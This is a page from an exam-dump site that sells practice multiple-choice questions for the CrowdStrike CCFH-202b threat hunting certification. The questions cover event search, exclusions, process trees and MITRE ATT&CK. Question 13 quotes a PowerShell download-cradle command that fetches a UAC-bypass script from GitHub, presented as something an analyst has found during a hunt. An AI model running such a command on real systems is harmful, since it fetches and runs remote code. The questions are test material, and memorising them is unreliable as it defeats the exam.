Spring Sale Limited Time 75% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code = simple75

Pass the CrowdStrike CCFH CCFH-202b Questions and answers with Dumpstech

Exam CCFH-202b Premium Access

View all detail and faqs for the CCFH-202b exam

Practice at least 50% of the questions to maximize your chances of passing.
Viewing page 2 out of 2 pages
Viewing questions 11-20 out of questions
Questions # 11:

You've written a complex query within Advanced Event Search that is returning millions of events, making it difficult to threat hunt for particular file metadata. Which option would decrease query time and remove values that are not of interest?

Options:

A.

Aggregating the results to group by a specific value

B.

Adding a value as column within the ingested field

C.

Filtering the results to remove irrelevant events

D.

Sorting the results by timestamp in descending order

Questions # 12:

Your organization uses an internally developed application for operations. The application is triggering Indicators of Attack (IOA) detections for vulnerable driver usage on servers where Falcon was just installed. After reviewing the application, you determine that application behavior is expected. What will reduce risk in the environment the most?

Options:

A.

Update the vulnerable driver to a non-vulnerable recent version

B.

Create a Machine Learning Exclusion

C.

Create an IOA exclusion for this activity

D.

Create a Sensor Visibility Exclusion

Questions # 13:

While performing a hunt for unusual PowerShell commands, you discover the following command being run on a single host:

powershell.exe "(New-Object Net.webclient).Downloadstring('https://raw.githubusercontent.com/.../invoke-AppPathBypass.ps1')"

The process tree for this command looks like this:

winlogon.exe > userinit.exe > explorer.exe > powershell_ise.exe > powershell.exe All of the commands are run during normal working hours under the account of a user from the IT department. What should be your next steps in the investigation?

Options:

A.

Start an RTR (Real Time Response) session on the host. Check the user's Downloads folder for the file AppPathBypass.ps1 and analyze the file for malicious content.

B.

Mark the detection as True Positive. Trigger an automated remediation to remove all malicious files and methods of persistence.

C.

Mark the detection as a False Positive because nothing happened on the host.

D.

Perform a +/- 10-minute search for events around this process execution to get more context. Contact the user to confirm whether or not this was testing-related activity.

Questions # 14:

You identify an instance of a user in your environment utilizing a Cloudflared tunnel daemon, resulting in unusual command line activity. What steps would you take to determine if the unusual activity is malicious or legitimate?

Options:

A.

Block all instances of Cloudflared in your environment and perform a forensic investigation into the host

B.

Create a forensic image of the hard drive and analyze it for indicators of compromise

C.

Immediately network contain the host and perform a forensic investigation into the host

D.

Review the specific commands associated and compare them with known legitimate use cases to confirm if patterns align with normal operations

Questions # 15:

Your team received a detection regarding a potentially malicious binary executing on an endpoint. Using CQL (CrowdStrike Query Language), you want to identify all events that relate to this detection. Which field is used to correlate events to this detection?

Options:

A.

TreeId

B.

ParentProcessId

C.

event_simpleName

D.

ComputerName

Questions # 16:

Which is a normal parent of cmd.exe on Windows?

Options:

A.

explorer.exe

B.

userinit.exe

C.

svchost.exe

D.

winlogon.exe

Questions # 17:

According to the MITRE ATT & CK Framework, if an adversary is trying to Gain Access by Credential Access via OS Credential Dumping, what is the specific attacker's technique that you can also use as a filter on the detections page to find similar activities?

Options:

A.

Gain Access

B.

OS Credential Dumping

C.

Credential Access

D.

Lateral Movement

Questions # 18:

What can a hunter add at the end of a search string in Advanced Event Search to identify outliers when quantifying the results?

Options:

A.

| groupBy()

B.

| eval()

C.

| sample()

D.

| stats()

Viewing page 2 out of 2 pages
Viewing questions 11-20 out of questions